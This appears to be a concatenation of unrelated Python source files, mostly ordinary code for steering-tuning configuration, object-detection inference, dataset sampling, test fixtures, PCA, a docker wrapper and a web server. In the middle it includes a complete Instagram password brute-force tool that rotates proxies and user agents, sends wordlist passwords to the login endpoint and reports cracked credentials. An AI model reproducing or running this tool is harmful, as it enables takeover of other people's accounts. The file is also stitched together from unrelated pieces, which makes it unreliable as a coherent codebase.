        if len(self.words) == 0:
            qualify = True
            first_word = True
        else:
            for letter in word[0]:
                if letter in self.letters:
                    qualify = True
        if not qualify:
            return
        cubes = list(self.cubes.values())
        shuffle(cubes)
        for cube in cubes:
            if self.max_word_length(cube) < len(word[0]):  # fixed: compare against the word's text
                continue
            directions = list(DIRECTIONS.items())
            shuffle(directions)
            for dir_label, direction in directions:
                max_word_length = self.max_word_length(cube, direction)
                if max_word_length < len(word[0]):
                    continue
                matches = cube.test(dir_label, word[0])
                if matches > (-1 if first_word else 0):
                    cube.engrave(dir_label, word[0])
                    self.store(word)
                    self.filled_cube_count += len(word[0]) - matches
                    return

    def store(self, word):
        self.words.append(word)
        for letter in word[0]:
            self.letters.setdefault(letter, 0)
            self.letters[letter] += 1

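# A minimal usage sketch for the Tiling API above. The word list is
# hypothetical; it assumes each word is a tuple whose first element is the
# text to engrave, as `engrave` and `store` expect.
def _tiling_demo():
    tiling = Tiling(radius=3)
    for w in [("python",), ("tone",), ("note",)]:
        tiling.engrave(w)
    print(tiling.fill_ratio)
    print(tiling.tiles)
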
from selfdrive.kegman_conf import kegman_conf


class AtomConf():
    def __init__(self, CP=None):
        self.kegman = kegman_conf()
        self.tun_type = 'lqr'
        self.sR_KPH = [0]  # speed breakpoints, kph
        self.sR_BPV = [[0, ]]
        self.sR_steerRatioV = [[13.85, ]]
        self.sR_ActuatorDelayV = [[0.1, ]]
        self.sR_pid_KdV = [[1.0, ]]
        self.sR_pid_KiV = [[0.01, ]]
        self.sR_pid_KpV = [[0.15, ]]
        self.sR_pid_deadzone = 0.1
        self.sR_lqr_kiV = [[0.01, ]]
        self.sR_lqr_scaleV = [[2000, ]]

        self.cv_KPH = [0.]  # speed breakpoints, kph
        self.cv_BPV = [[200., 255.]]  # CV
        self.cv_sMaxV = [[384., 255.]]
        self.cv_sdUPV = [[3, 2]]
        self.cv_sdDNV = [[7, 5]]

        self.steerOffset = 0.0
        self.steerRateCost = 0.4
        self.steerLimitTimer = 0.8
        self.steerActuatorDelay = 0.1
        self.cameraOffset = 0.05
        self.ap_autoReasume = 1
        self.ap_autoScnOffTime = 0
        self.learnerParams = 1
        self.read_tune()

    def read_tune(self):
        conf = self.kegman.read_config()
        self.learnerParams = conf['learnerParams']
        self.ap_autoReasume = conf['ap_autoReasume']
        self.ap_autoScnOffTime = conf['ap_autoScnOffTime']
        self.tun_type = conf['tun_type']
        self.sR_KPH = conf['sR_KPH']
        self.sR_BPV = conf['sR_BPV']
        self.sR_steerRatioV = conf['sR_steerRatioV']
        self.sR_ActuatorDelayV = conf['sR_ActuatorDelayV']
        self.sR_pid_KdV = conf['sR_pid_KdV']
        self.sR_pid_KiV = conf['sR_pid_KiV']
        self.sR_pid_KpV = conf['sR_pid_KpV']
        self.sR_pid_deadzone = conf['sR_pid_deadzone']
        self.sR_lqr_kiV = conf['sR_lqr_kiV']
        self.sR_lqr_scaleV = conf['sR_lqr_scaleV']
        self.cv_KPH = conf['cv_KPH']
        self.cv_BPV = conf['cv_BPV']
        self.cv_sMaxV = conf['cv_sMaxV']
        self.cv_sdUPV = conf['cv_sdUPV']
        self.cv_sdDNV = conf['cv_sdDNV']
        self.steerOffset = conf['steerOffset']
        self.steerRateCost = conf['steerRateCost']
        self.steerLimitTimer = conf['steerLimitTimer']
        self.cameraOffset = conf['cameraOffset']

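# Hypothetical consumption sketch for the speed-indexed tables above: tuning
# values are typically interpolated over the breakpoint vectors. np.interp is
# an assumption here; the real consumer lives elsewhere in the codebase.
def _steer_ratio_at(conf, v_kph, idx=0):
    import numpy as np
    # interpolate the steer ratio table over its speed breakpoints
    return np.interp(v_kph, conf.sR_BPV[idx], conf.sR_steerRatioV[idx])
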
# misc_utils/inference_utils.py
import cv2
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing import image
from imageio import imread
import numpy as np
from matplotlib import pyplot as plt

from keras_layers.keras_layer_AnchorBoxes import AnchorBoxes
from keras_layers.keras_layer_DecodeDetections import DecodeDetections
from keras_layers.keras_layer_L2Normalization import L2Normalization
from keras_loss_function.keras_ssd_loss import SSDLoss
from ssd_encoder_decoder.ssd_output_decoder import decode_detections


def load_det_model(model_path_):
    ssd_loss = SSDLoss(neg_pos_ratio=3, n_neg_min=0, alpha=1.0)
    model = load_model(model_path_, custom_objects={'AnchorBoxes': AnchorBoxes,
                                                    'L2Normalization': L2Normalization,
                                                    'DecodeDetections': DecodeDetections,
                                                    'compute_loss': ssd_loss.compute_loss})
    return model


def do_detections(images_list_, image_base_path_, model_, img_height, img_width):
    orig_images = []  # store the original image sizes here
    resize_images = []
    for i in images_list_:
        img_ = imread(image_base_path_ + i)
        orig_images.append([img_.shape[0], img_.shape[1]])
        img = image.load_img(image_base_path_ + i, target_size=(img_height, img_width))
        img = image.img_to_array(img)
        resize_images.append(img)
    resize_images = np.array(resize_images)

    # Do predictions
    preds = model_.predict(resize_images)

    # Decode predictions
    preds_decoded = decode_detections(preds,
                                      confidence_thresh=0.5,
                                      iou_threshold=0.5,
                                      top_k=200,
                                      normalize_coords=True,
                                      img_height=img_height,
                                      img_width=img_width)
    return preds_decoded, orig_images


def print_detections(detections_):
    for d in detections_:
        np.set_printoptions(precision=2, suppress=True, linewidth=90)
        print("Predicted boxes:\n")
        print('   class   conf xmin   ymin   xmax   ymax')
        print(d)


def cv_show_detections(detections_, image_list, image_base, class_names, dest_path_):
    for i, d in enumerate(detections_):
        image_ = cv2.imread(image_base + image_list[i])
        name = image_list[i]
        for box in d:
            xmin = box[2]
            ymin = box[3]
            xmax = box[4]
            ymax = box[5]
            image_ = cv2.rectangle(image_, (xmin, ymin), (xmax, ymax), (0, 255, 0), 1)


def cv_show_detection(detections_, image_, color, linewidth, class_names):
    for detection in detections_:
        for box in detection:
            print(box)
            xmin = int(box[2])
            ymin = int(box[3])
            xmax = int(box[4])
            ymax = int(box[5])
            image_ = cv2.rectangle(image_, (xmin, ymin), (xmax, ymax), color, linewidth)
    return image_


def show_detections(detections_, image_list, image_base, class_names, dest_path_, img_height, img_width):
    colors = ["#F28544", "#1DFA51", "#EDDC15", "#1E6AC2"]
    for i, d in enumerate(detections_):
        plt.figure(figsize=(20, 12))
        current_axis = plt.gca()
        plt.axis(False)
        image_ = imread(image_base + image_list[i])
        name = image_list[i]
        plt.imshow(image_)
        for box in d:
            # Map box coordinates from network resolution back to the original image.
            xmin = box[2] * image_.shape[1] / img_width
            ymin = box[3] * image_.shape[0] / img_height
            xmax = box[4] * image_.shape[1] / img_width
            ymax = box[5] * image_.shape[0] / img_height
            class_ = int(box[0])
            conf = box[1]
            label = '{}: {:.2f}'.format(class_names[class_], conf)
            current_axis.add_patch(
                plt.Rectangle((xmin, ymin), xmax - xmin, ymax - ymin,
                              color=colors[class_], fill=False, linewidth=1))
            current_axis.text(xmin, ymin, label, size='x-small', color='white',
                              bbox={'facecolor': colors[class_], 'alpha': 1.0})
        plt.savefig(dest_path_ + name, dpi=100, bbox_inches="tight")

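# Hypothetical end-to-end sketch for the helpers above; the model path, image
# names, output directory, and class list are placeholders, not values that
# appear in this repo.
def _inference_demo():
    model = load_det_model('models/ssd300.h5')
    preds, orig_sizes = do_detections(['img1.jpg'], 'data/images/', model,
                                      img_height=300, img_width=300)
    print_detections(preds)
    show_detections(preds, ['img1.jpg'], 'data/images/',
                    ['background', 'car', 'person', 'bike'], 'out/', 300, 300)
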
# duanzhiihao/mycv: sample a subset of ImageNet classes/images into annotation files.
import os
from tqdm import tqdm
from pathlib import Path
import random

from mycv.paths import IMAGENET_DIR
from mycv.datasets.imagenet import WNIDS, WNID_TO_IDX


def main():
    sample(200, 600, 50)


def sample(num_cls=200, num_train=600, num_val=50):
    assert IMAGENET_DIR.is_dir()
    train_root = IMAGENET_DIR / 'train'

    # check if imageset file already exists
    trainlabel_path = IMAGENET_DIR / f'annotations/train{num_cls}_{num_train}.txt'
    vallabel_path = IMAGENET_DIR / f'annotations/val{num_cls}_{num_train}.txt'
    if trainlabel_path.exists():
        print(f'Warning: {trainlabel_path} already exist. Removing it...')
        os.remove(trainlabel_path)
    if vallabel_path.exists():
        print(f'Warning: {vallabel_path} already exist. Removing it...')
        os.remove(vallabel_path)

    wnid_subset = random.sample(WNIDS, k=num_cls)
    for cls_idx, wnid in tqdm(enumerate(wnid_subset)):
        img_dir = train_root / wnid
        assert img_dir.is_dir()
        img_names = os.listdir(img_dir)
        # select the num_train and num_val images
        assert len(img_names) > num_train + num_val
        imname_subset = random.sample(img_names, num_train + num_val)
        train_names = imname_subset[:num_train]
        val_names = imname_subset[num_train:num_train + num_val]
        # write names to an annotation file
        with open(trainlabel_path, 'a', newline='\n') as f:
            for imname in train_names:
                assert imname.endswith('.JPEG')
                f.write(f'{wnid}/{imname} {cls_idx}\n')
        with open(vallabel_path, 'a', newline='\n') as f:
            for imname in val_names:
                assert imname.endswith('.JPEG')
                f.write(f'{wnid}/{imname} {cls_idx}\n')


if __name__ == "__main__":
    main()

# opsdroid_homeassistant/tests/conftest.py
from asyncio import sleep
import os

import pytest
import requests
from requests.exceptions import ConnectionError

from opsdroid.core import OpsDroid
from opsdroid.cli.start import configure_lang


@pytest.fixture(scope="session")
def docker_compose_file(pytestconfig):
    return os.path.join(
        str(pytestconfig.rootdir),
        "opsdroid_homeassistant",
        "tests",
        "docker-compose.yml",
    )


@pytest.fixture(scope="session")
def access_token():
    return "<KEY>"


@pytest.fixture(scope="session")
def homeassistant(docker_ip, docker_services, access_token):
    """Ensure that Home Assistant is up and responsive."""

    def is_responsive(url, headers):
        try:
            response = requests.get(url, headers=headers)
            if response.status_code == 200:
                return True
        except ConnectionError:
            return False

    port = docker_services.port_for("homeassistant", 8123)
    url = "http://{}:{}".format(docker_ip, port)
    docker_services.wait_until_responsive(
        timeout=30.0,
        pause=0.1,
        check=lambda: is_responsive(url, {"Authorization": "Bearer " + access_token}),
    )
    return url


@pytest.fixture
def connector_config(homeassistant, access_token):
    return {"token": access_token, "url": homeassistant}


@pytest.fixture
def mock_skill_path():
    return os.path.join(os.path.dirname(os.path.abspath(__file__)), "mock_skill")


@pytest.fixture
async def opsdroid(connector_config, mock_skill_path):
    config = {
        "connectors": {"homeassistant": connector_config},
        "skills": {"test": {"path": mock_skill_path}},
    }
    configure_lang({})
    with OpsDroid(config) as opsdroid:
        await opsdroid.load()
        await opsdroid.start_connectors()
        await sleep(0.1)  # Give the startup tasks some room to breathe
        yield opsdroid
        await opsdroid.stop()
        await opsdroid.unload()


@pytest.fixture
async def connector(opsdroid):
    [connector] = opsdroid.connectors
    return connector


@pytest.fixture
async def mock_skill(opsdroid):
    return opsdroid.mock_skill

# src/AngleMeasurement/PCASmallestEig.py
import numpy as np
from .PowerMethod import power_method


def pca_smallest_eig(X, center=True):
    """Eigenvector of the (optionally centered) covariance with the smallest eigenvalue."""
    if center:
        m = np.mean(X, axis=0)
        cov = np.transpose(X - m) @ (X - m)
    else:
        cov = np.transpose(X) @ X
    w, v = np.linalg.eig(cov)
    i = np.argmin(w)
    return v[:, i]


def pca_smallest_eig_powermethod(X, center=True):
    """Same vector via the power method: shifting the covariance by (lmax + 1)
    makes its smallest eigenvalue the dominant one of the shifted matrix."""
    if center:
        m = np.mean(X, axis=0)
        cov = np.transpose(X - m) @ (X - m) / X.shape[0]
    else:
        cov = np.transpose(X) @ X / X.shape[0]
    lmax, v = power_method(cov)
    _l, v = power_method(cov - (lmax + 1) * np.eye(3))
    return v.flatten()

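# Quick consistency sketch for the two routines above: on random 3-D data the
# returned directions should agree up to sign (|dot product| close to 1).
# Assumes the sibling PowerMethod module is importable.
def _pca_check():
    X = np.random.randn(100, 3)
    v1 = pca_smallest_eig(X)
    v2 = pca_smallest_eig_powermethod(X)
    print(np.abs(np.dot(v1, v2)))  # expect a value near 1
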
import os
from subprocess import CompletedProcess

import docker

from .sdpb import Sdpb


class SdpbDocker(Sdpb):
    """Interface for running ``SDPB`` and related software in a docker container

    Warning:
        To use this interface docker must be installed and has to be able to
        pull the specified image

    It's recommended to have at least a basic knowledge of how `docker
    <https://www.docker.com/>`_ works, in particular about `volumes
    <https://docs.docker.com/storage/volumes/>`_.

    By default it uses the `official docker image
    <https://hub.docker.com/r/wlandry/sdpb>`_ and the executable paths are the
    ones of this docker image.

    Args:
        volume: directory that will be mounted inside the docker container,
            defaults to ``'.'`` which is the current directory
        user: user that will run the docker command, defaults to ``None``
            which is the current user
        image: docker image of ``SDPB``
        sdpb_bin: path of the ``sdpb`` binary inside the docker image
        pvm2sdp_bin: path of the ``pvm2sdp`` binary inside the docker image
        mpirun_bin: path of the ``mpirun`` binary inside the docker image
        unisolve_bin: path of the ``unisolve`` binary inside the docker image

    Attributes:
        volume_abs: absolute path of ``volume``
        debug: flags for debugging (makes
            :func:`~pycftboot.sdpb.sdpb_docker.SdpbDocker.run_command`
            output the command to ``stdout``)
    """

    def __init__(self, volume: str = '.', user: str = None,
                 image: str = "wlandry/sdpb:2.5.1",
                 sdpb_bin: str = "/usr/local/bin/sdpb",
                 pvm2sdp_bin: str = "/usr/local/bin/pvm2sdp",
                 mpirun_bin: str = "/usr/bin/mpirun",
                 unisolve_bin: str = "/usr/local/bin/unisolve"):
        # User and docker volume stuff
        if user is None:
            user = os.getuid()
        self.user = f'{user}:{user}'

        self.volume = volume
        self.volume_abs = os.path.abspath(volume)
        os.makedirs(self.volume, exist_ok=True)

        self.image = image

        self.bin = sdpb_bin
        self.pvm2sdp_bin = pvm2sdp_bin
        self.mpirun_bin = mpirun_bin
        self.unisolve_bin = unisolve_bin

        self.debug = False

        super().__init__()

    def run_command(self, command: list) -> CompletedProcess:
        """Run command in the docker container specified by ``image``

        This is basically a wrapper of the docker API which runs the
        equivalent command line command::

            docker run -v <volume>:/work/<volume> -w /work -u <user> -d <image> <command>

        If the ``debug`` attribute is ``True`` it prints the ``command`` to
        ``stdout``

        Args:
            command: command to run as a list
        """
        # Print command to stdout if debug is true
        if self.debug:
            print(" ".join(command))

        # Initialize docker client
        client = docker.from_env()

        container = client.containers.run(
            self.image,
            command=command,
            user=self.user,
            environment={'OMPI_ALLOW_RUN_AS_ROOT': '1',
                         'OMPI_ALLOW_RUN_AS_ROOT_CONFIRM': '1'},
            volumes={self.volume_abs: {'bind': f'/work/{self.volume}', 'mode': 'rw'}},
            working_dir='/work',
            detach=True
        )
        result = container.wait()
        stdout = container.logs(stdout=True, stderr=False).decode("utf-8")
        stderr = container.logs(stdout=False, stderr=True).decode("utf-8")
        if result["StatusCode"] != 0:
            raise RuntimeError(stderr)

        container.remove()
        client.close()

        completed_process = CompletedProcess(
            args=command,
            returncode=result["StatusCode"],
            stdout=stdout,
            stderr=stderr
        )
        completed_process.check_returncode()

        return completed_process

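# Hypothetical usage sketch: run `sdpb --help` inside the container. Assumes
# docker is installed and the image can be pulled (see the class docstring);
# the volume name is a placeholder.
def _sdpb_demo():
    sdpb = SdpbDocker(volume='work')
    result = sdpb.run_command([sdpb.bin, '--help'])
    print(result.stdout)
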
# (separate one-line module re-exporting the template helper)
from .render_yaml import template

# exploit/socialbrute/__mainig__.py
# coding=utf-8
# !/usr/bin/python
from __future__ import print_function
from instabrute import *

import argparse
import logging
import random
import socket
import sys
import threading

r = "\x1b[91m"
w = "\x1b[00m"
c = "\x1b[36;1m"
y = "\x1b[33m"

try:
    import urllib.request as rq
    from urllib.error import HTTPError
    import urllib.parse as http_parser
except ImportError:
    import urllib2 as rq
    from urllib2 import HTTPError
    import urllib as http_parser

try:
    import Queue
except ImportError:
    import queue as Queue


def check_proxy(q):
    """
    check proxy for and append to working proxies
    :param q:
    """
    if not q.empty():
        proxy = q.get(False)
        proxy = proxy.replace("\r", "").replace("\n", "")
        try:
            opener = rq.build_opener(
                rq.ProxyHandler({'https': 'https://' + proxy}),
                rq.HTTPHandler(),
                rq.HTTPSHandler()
            )
            opener.addheaders = [('User-agent', 'Mozilla/5.0')]
            rq.install_opener(opener)
            req = rq.Request('https://api.ipify.org/')
            if rq.urlopen(req).read().decode() == proxy.partition(':')[0]:
                proxys_working_list.update({proxy: proxy})
                if _verbose:
                    print(c + "[+]" + w + " Successfully connected with " + proxy)
            else:
                if _verbose:
                    print(r + "[!]" + w + " Failed to connect with " + proxy)
        except Exception as err:
            if _verbose:
                print(r + "[!]" + w + " Failed to connect with " + proxy)
            if _debug:
                logger.error(err)
            pass


def get_csrf():
    """
    get CSRF token from login page to use in POST requests
    """
    global csrf_token
    print(y + "[+]" + w + " Trying to get CSRF token ...")
    try:
        opener = rq.build_opener(rq.HTTPHandler(), rq.HTTPSHandler())
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        rq.install_opener(opener)
        request = rq.Request('https://www.instagram.com/')
        try:
            # python 2
            headers = rq.urlopen(request).info().headers
        except Exception:
            # python 3
            headers = rq.urlopen(request).info().get_all('Set-Cookie')
        for header in headers:
            if header.find('csrftoken') != -1:
                csrf_token = header.partition(';')[0].partition('=')[2]
                print(c + "[+]" + w + " CSRF Token : " + csrf_token)
    except Exception as err:
        print(r + "[!]" + w + " Oops, cant get CSRF token, please try again")
        if _debug:
            logger.error(err)
        print("[!]" " Exiting ...")
        exit(3)


def brute(q):
    """
    main worker function
    :param q:
    :return:
    """
    if not q.empty():
        try:
            proxy = None
            if len(proxys_working_list) != 0:
                proxy = random.choice(list(proxys_working_list.keys()))
            word = q.get()
            word = word.replace("\r", "").replace("\n", "")
            post_data = {
                'username': USER,
                'password': word,  # candidate password (redacted in the dump)
            }
            header = {
                "User-Agent": random.choice(user_agents),
                'X-Instagram-AJAX': '1',
                "X-CSRFToken": csrf_token,
                "X-Requested-With": "XMLHttpRequest",
                "Referer": "https://www.instagram.com/",
                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                'Cookie': 'csrftoken=' + csrf_token
            }
            if proxy:
                if _verbose:
                    print(y + "[-]" + w + " Password incorrect %s %s " % (word, proxy,))
                opener = rq.build_opener(
                    rq.ProxyHandler({'https': 'https://' + proxy}),
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )
            else:
                if _verbose:
                    print(y + "[-]" + w + " Password incorrect %s" % (word,))
                opener = rq.build_opener(
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )
            rq.install_opener(opener)
            req = rq.Request(URL, data=http_parser.urlencode(post_data).encode('ascii'), headers=header)
            sock = rq.urlopen(req)

            if sock.read().decode().find('"authenticated": true') != -1:
                print(c + "\n[+]" + w + " Successful exploitation")
                print(w + " Username: " + y, USER)
                print(w + " Password: " + y, word)
                found_flag = True
                q.queue.clear()
            q.task_done()
        except HTTPError as e:
            if e.getcode() == 400 or e.getcode() == 403:
                if e.read().decode("utf8", 'ignore').find('"checkpoint_required"') != -1:
                    print(c + "\n[!]" + w + " Successfully login, but checkpoint")
                    print("")
                    print(r + "[!]" + w + " Username: " + y, USER)
                    print(r + "[!]" + w + " Password: " + y, word)
                    print("")
                    found_flag = True
                    q.queue.clear()
                    q.task_done()
                    return
                elif proxy:
                    print(r + "[!] Error:" + w + " Proxy IP %s now is blocked by instagram" % (proxy,))
                    if proxy in proxys_working_list:
                        proxys_working_list.pop(proxy)
                    print(c + "[+]" + w + " Online Proxy: ", str(len(proxys_working_list)))
                else:
                    print(r + "[!] Error:" + w + " Your IP now is blocked by instagram")
                    print(r + "[!]" + w + " Please use Proxy or VPN App")
            else:
                print(r + "[!]" + w + " Error:", e.getcode())
            q.task_done()
            return
        except Exception as err:
            if _debug:
                print(r + "[!]" + w + " Problems in the proxy connection")
                logger.error(err)
            else:
                print(r + "[!]" + w + " Problems in the proxy connection")
            pass
        return


def starter():
    """
    threading workers initialize
    """
    global found_flag
    queue = Queue.Queue()
    threads = []
    max_thread = THREAD
    found_flag = False
    queuelock = threading.Lock()
    print(y + "\n[-]" + w + " Preparing for attack ...")
    print(c + "[!]" + w + " Bruteforce is running\n")
    try:
        for word in words:
            queue.put(word)
        while not queue.empty():
            queuelock.acquire()
            for workers in range(max_thread):
                t = threading.Thread(target=brute, args=(queue,))
                t.setDaemon(True)
                t.start()
                threads.append(t)
            for t in threads:
                t.join()
            queuelock.release()
            if found_flag:
                break
        print("")
        print(y + "[!]" + w + " Bruteforce attack completed")
    except Exception as err:
        print(err)


def check_avalaible_proxys(proxys):
    """
    check avalaible proxyies from proxy_list file
    """
    socket.setdefaulttimeout(30)
    global proxys_working_list
    print(y + "[-]" + w + " Try connecting with a proxy list ...\n")
    proxys_working_list = {}
    max_thread = THREAD
    queue = Queue.Queue()
    queuelock = threading.Lock()
    threads = []
    for proxy in proxys:
        queue.put(proxy)
    while not queue.empty():
        queuelock.acquire()
        for workers in range(max_thread):
            t = threading.Thread(target=check_proxy, args=(queue,))
            t.setDaemon(True)
            t.start()
            threads.append(t)
        for t in threads:
            t.join()
        queuelock.release()
    print(c + "[+]" + w + " Successfully connected with " + str(len(proxys_working_list)) + " proxy")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Instagram BruteForcer",
        epilog="./instabrute -u user_test -w words.txt -p proxys.txt -t 4 -d -v"
    )
    # required arguments
    parser.add_argument('-u', '--username', action="store", required=True, help='Target Username')
    parser.add_argument('-w', '--word', action="store", required=True, help='Words list path')
    parser.add_argument('-p', '--proxy', action="store", required=True, help='Proxy list path')
    # optional arguments
    parser.add_argument('-t', '--thread', help='Thread', type=int, default=4)
    parser.add_argument('-v', '--verbose', action='store_const', help='Thread', const=True, default=False)
    parser.add_argument('-d', '--debug', action='store_const', const=True, help='Debug mode', default=False)
    args = parser.parse_args()

    URL = "https://www.instagram.com/accounts/login/ajax/"
    USER = args.username
    THREAD = args.thread
    _verbose = args.verbose
    _debug = args.debug

    user_agents = ["Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
                   "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko)",
                   "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1",
                   "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko)",
                   "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
                   "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
                   "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"]

    try:
        words = open(args.word).readlines()
    except IOError:
        print("[-]" " Error: Check your word list file path\n")
        sys.exit(1)
    try:
        proxys = open(args.proxy).readlines()
    except IOError:
        print("[-]" " Error: Check your proxy list file path\n")
        sys.exit(1)

    # enable debugging if it's set
    if _debug:
        # Logging stuff
        logging.basicConfig(level=logging.DEBUG, filename="log",
                            format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        logger = logging.getLogger(__name__)

    print(y + "[-]" + w + " Starting bruteforce attack to", USER)
    print(y + "[-]" + w + " List of words found on file", str(len(words)))
    print(y + "[-]" + w + " List of proxy found on proxys.txt", str(len(proxys)))
    check_avalaible_proxys(proxys)
    get_csrf()
    starter()

# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements.  See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License.  You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import os
import ConfigParser
import importlib
import logging
import sys

import pkg_resources
import tornado.web
import webservice.algorithms_spark.NexusCalcSparkHandler
from tornado.options import define, options, parse_command_line

from webservice import NexusHandler
from webservice.nexus_tornado.request.handlers import NexusRequestHandler


def inject_args_in_config(args, config):
    """
    Takes command argparse arguments and push them in the config
    with syntax args.<section>-<option>
    """
    log = logging.getLogger(__name__)
    for t_opt in args._options.values():
        n = t_opt.name
        first_ = n.find('_')
        if first_ > 0:
            s, o = n[:first_], n[first_ + 1:]
            v = t_opt.value()
            log.info('inject argument {} = {} in configuration section {}, option {}'.format(n, v, s, o))
            if not config.has_section(s):
                config.add_section(s)
            config.set(s, o, v)
    return config


if __name__ == "__main__":

    logging.basicConfig(
        level=logging.DEBUG,
        format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
        datefmt="%Y-%m-%dT%H:%M:%S", stream=sys.stdout)

    log = logging.getLogger(__name__)

    webconfig = ConfigParser.RawConfigParser()
    webconfig.readfp(pkg_resources.resource_stream(__name__, "config/web.ini"), filename='web.ini')

    algorithm_config = ConfigParser.RawConfigParser()
    algorithm_config.readfp(pkg_resources.resource_stream(__name__, "config/algorithms.ini"),
                            filename='algorithms.ini')

    define("debug", default=False, help="run in debug mode")
    define("port", default=webconfig.get("global", "server.socket_port"),
           help="run on the given port", type=int)
    define("address", default=webconfig.get("global", "server.socket_host"),
           help="Bind to the given address")
    define('solr_time_out', default=60,
           help='time out for solr requests in seconds, default (60) is ok for most deployments'
                ' when solr performances are not good this might need to be increased')
    parse_command_line()
    algorithm_config = inject_args_in_config(options, algorithm_config)

    moduleDirs = webconfig.get("modules", "module_dirs").split(",")
    for moduleDir in moduleDirs:
        log.info("Loading modules from %s" % moduleDir)
        importlib.import_module(moduleDir)

    staticDir = webconfig.get("static", "static_dir")
    staticEnabled = webconfig.get("static", "static_enabled") == "true"

    log.info("Initializing on host address '%s'" % options.address)
    log.info("Initializing on port '%s'" % options.port)
    log.info("Starting web server in debug mode: %s" % options.debug)
    if staticEnabled:
        log.info("Using static root path '%s'" % staticDir)
    else:
        log.info("Static resources disabled")

    handlers = []

    log.info("Running Nexus Initializers")
    NexusHandler.executeInitializers(algorithm_config)

    max_request_threads = webconfig.getint("global", "server.max_simultaneous_requests")
    log.info("Initializing request ThreadPool to %s" % max_request_threads)
    request_thread_pool = tornado.concurrent.futures.ThreadPoolExecutor(max_request_threads)

    # Lazily create a single Spark context, shared by all Spark-based handlers.
    spark_context = None
    for clazzWrapper in NexusHandler.AVAILABLE_HANDLERS:
        if issubclass(clazzWrapper,
                      webservice.algorithms_spark.NexusCalcSparkHandler.NexusCalcSparkHandler):
            if spark_context is None:
                from pyspark.sql import SparkSession
                spark = SparkSession.builder.appName("nexus-analysis").getOrCreate()
                spark_context = spark.sparkContext
            handlers.append(
                (clazzWrapper.path, NexusRequestHandler,
                 dict(clazz=clazzWrapper, algorithm_config=algorithm_config,
                      sc=spark_context, thread_pool=request_thread_pool)))
        else:
            handlers.append(
                (clazzWrapper.path, NexusRequestHandler,
                 dict(clazz=clazzWrapper, thread_pool=request_thread_pool)))


    class VersionHandler(tornado.web.RequestHandler):
        def get(self):
            self.write(pkg_resources.get_distribution("nexusanalysis").version)


    handlers.append((r"/version", VersionHandler))

    if staticEnabled:
        handlers.append(
            (r'/(.*)', tornado.web.StaticFileHandler,
             {'path': staticDir, "default_filename": "index.html"}))

    app = tornado.web.Application(
        handlers,
        default_host=options.address,
        debug=options.debug
    )
    app.listen(options.port)

    log.info("Starting HTTP listener...")
    tornado.ioloop.IOLoop.current().start()

""" Module Name: Preprocessing Module Source Path: modules/preprocessing.py Description: This python module contains a concrete class which manages the creation of the project's data system. It is made to support the initialization of many different regions' covid/income data, but only has the city of Toronto implemented. This class also is in charge of calling the regression module onto a certain region. """ from modules import data_loading as dl from modules.config import TorontoConfig from modules.entities import * from modules.regression import ExponentialRegressionModel class PreprocessingSystem: """ Class to manage all preprocessing of data for a model. Instance Attributes: - regions: a dictionary mapping the name of a region to an instance of a Region. """ regions: dict[str: SuperRegion] def __init__(self) -> None: self.regions = {} def init_toronto_model(self) -> None: """ Initialise classes for toronto model. """ config = TorontoConfig() print('[modules.preprocessing] Generating Toronto Model') data_loading_system = dl.DataLoadingToronto(config.start_date, config.end_date) self.regions['Toronto'] = data_loading_system.load_super_region(config.paths['regions']) neighbourhoods = data_loading_system.load_sub_regions(config.paths['regions'], self.regions['Toronto']) for neighbourhood in neighbourhoods.values(): self.regions['Toronto'].add_sub_region(neighbourhood) neighbourhood_cases = data_loading_system.load_covid_cases(config.paths['cases'], neighbourhood) for case in neighbourhood_cases.values(): neighbourhood.add_covid_case(case) self.regions['Toronto'].update_economic_scaling() self.regions['Toronto'].update_case_scaling() self.toronto_model_regression() def toronto_model_regression(self) -> None: """ Generates exponential regression model for toronto data. """ print('[modules.preprocessing] Generating Toronto regression model') config = TorontoConfig() coordinates = [(neighbourhood.scaled_economic_index, neighbourhood.scaled_case_index) for neighbourhood in self.regions['Toronto'].neighbourhoods.values()] self.regions['Toronto'].regression_model = ExponentialRegressionModel(coordinates, config.regression['angle_divisor']) if __name__ == '__main__': import python_ta.contracts python_ta.contracts.DEBUG_CONTRACTS = False python_ta.contracts.check_all_contracts() import doctest doctest.testmod(verbose=True) import python_ta python_ta.check_all(config={ 'extra-imports': ['modules.regression', 'modules.data_loading', 'modules.entities', 'modules.config'], 'allowed-io': [], 'max-line-length': 100, 'disable': ['R1705', 'C0200'] })
from functools import partial
import uuid

from django.contrib.auth.models import AbstractUser
from django.db import models
from django.utils.crypto import get_random_string

make_stream_key = partial(get_random_string, 20)


class CustomUser(AbstractUser):
    # additional fields beyond AbstractUser
    uid = models.UUIDField(default=uuid.uuid4, editable=False, unique=True)
    channels = models.TextField(blank=True)
    privs = models.TextField(blank=True)
    subs = models.TextField(blank=True)

    def __str__(self):
        return self.username


class Channel(models.Model):
    cid = models.UUIDField(primary_key=True, default=uuid.uuid4, unique=True)
    title = models.CharField(max_length=255)
    slug = models.SlugField(unique=True, max_length=255)
    vods = models.TextField(blank=True)
